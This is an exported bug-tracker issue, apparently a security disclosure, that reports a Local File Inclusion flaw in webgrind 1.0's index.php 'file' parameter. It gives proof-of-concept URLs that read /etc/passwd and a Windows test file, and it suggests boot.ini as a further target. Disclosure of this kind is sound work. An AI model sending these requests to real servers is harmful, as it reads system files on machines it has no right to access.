woodtime / webgrind

Automatically exported from code.google.com/p/webgrind
Other
0 stars 0 forks source link

webgrind 1.0 (trunk 1.02) Local FIle Inclusion (LFI) Vulnerability #66

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
index.php, param: file

The lfitest.txt is located in C:\ (c:\lfitext.txt), you can replace it with 
boot.ini for example.

- http://localhost/webgrind/index.php?file=/lfitest.txt&op=fileviewer
- http://localhost/webgrind/index.php?file=/etc/passwd&op=fileviewer

2. Tested on current version of WampServer version 2.2c (win32) and fedora 
linux.
3. Webgrind version 1.0 (trunk v1.02 (github))

Thank You,

Gjoko,
lab@zeroscience.mk

Original issue reported on code.google.com by liquidw...@gmail.com on 22 Feb 2012 at 3:22